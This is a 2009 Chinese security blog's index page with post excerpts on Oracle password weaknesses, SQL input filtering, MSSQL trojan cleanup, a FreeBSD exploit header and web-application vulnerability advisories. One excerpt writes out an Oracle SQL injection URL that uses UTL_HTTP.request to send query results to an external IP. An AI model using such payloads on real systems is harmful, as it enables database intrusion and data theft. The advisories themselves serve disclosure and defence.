Submitted by Akira on 2009, July 11, 10:14 AM
1 标准的Oracle 密码可以由英文字母,数字,#,下划线(_),美元字符($)构成,密码的最大长度为30 字符;Oracle 密码不能以"$","#","_"或任何数字开头;密码不能包含"SELECT","DELETE","CREATE"这类的Oracle/SQL 关键字。
2 Oracle 的弱算法加密机制:两个相同的用户名和密码在两台不同的Oracle 数据库机器中,将具有相同的
哈希值。这些哈希值存储在SYS.USER$表中。可以通过像DBA_USERS 这类的视图来访问。
3 Oracle 默认配置下,每个帐户如果有10 次的失败登录,此帐户将会被锁定。但是SYS 帐户在Oracle 数
据库中具有最高权限,能够做任何事情,包括启动/关闭Oracle 数据库。即使SYS 被锁定,也依然能够访问
数据库。
» 阅读全文
Submitted by Akira on 2009, July 11, 10:11 AM
众所周知,数据库操作中对于一些特殊字符(例如单引号“'”、反斜线“\”等元字符)有着严格的限制,如果向数据库中写入的数据含有这样的特殊字符,操作将会带来不安全因素。所以对于用户输入的数据,我们完全认为它是没有安全性的,需要在程序中对其进行适当的过滤处理后,方可写入数据库。
» 阅读全文
Submitted by Akira on 2009, July 11, 10:10 AM
MSSQL数据库被插入木马批量删除sql语句
MSSQL数据库被插入木马批量删除sql语句,一朋友服务器被批量插入了js木马,几乎每个表的文本字段都被插入了,网上找了这个sql语句,留着备用。
» 阅读全文
Submitted by Akira on 2009, July 11, 10:03 AM
.前提
服务里 windows防火墙停止(或者麻烦点可以把router协议,端口1723配进去)
远程注册表服务必须开启
server服务必须开启
router路由服务必须开启
» 阅读全文
Submitted by Akira on 2009, July 11, 10:01 AM
url语句简单如下所示:
http://localhost/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--
内容如下:
» 阅读全文
Submitted by Akira on 2009, July 11, 9:53 AM
* cve-2008-3531.c -- Patroklos Argyroudis, argp at domain census-labs.com
*
* Privilege escalation exploit for the FreeBSD-SA-08:08.nmount
* (CVE-2008-3531) vulnerability:
» 阅读全文
Submitted by Akira on 2009, July 11, 9:51 AM
The FileServer script allows a user using Windows Live Messenger Plus! to share a defined folder and its subfolders and files with a contact.
Authentication is done using a user-defined username and password.
I have found a vulnerability in this script, which allows for downloading of EVERY file on the same disk as the defined folder ("root folder"),
even outside the root folder. The script can be found at http://www.msgpluslive.nl/scripts/view/65-FileServer/
» 阅读全文
Submitted by Akira on 2009, July 11, 9:49 AM
WordPress is a web application written in PHP that allows the easy
installation of a flexible weblog on any computer connected to the
Internet. WordPress 2.7 reached more than 6 million downloads during
June 2009 [9].
A vulnerability was found in the way that WordPress handles some URL
requests. This results in unprivileged users viewing the content of
plugins configuration pages, and also in some plugins modifying plugin
options and injecting JavaScript code. Arbitrary native code may be run
by a malicious attacker if the blog administrator runs injected
JavasScript code that edits blog PHP code. Many WordPress-powered blogs,
hosted outside 'wordpress.com', allow any person to create unprivileged
users called subscribers. Other sensitive username information
disclosures were found in WordPress.
» 阅读全文
| « 2009年07月 » | ||||||
| 日 | 一 | 二 | 三 | 四 | 五 | 六 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | |||
| 5 | 6 | 7 | 8 | 9 | 10 | 11 |
| 12 | 13 | 14 | 15 | 16 | 17 | 18 |
| 19 | 20 | 21 | 22 | 23 | 24 | 25 |
| 26 | 27 | 28 | 29 | 30 | 31 | |
[43] [12] [16] [3] [2] [6] [4] [10] [3] [9] [6] [1]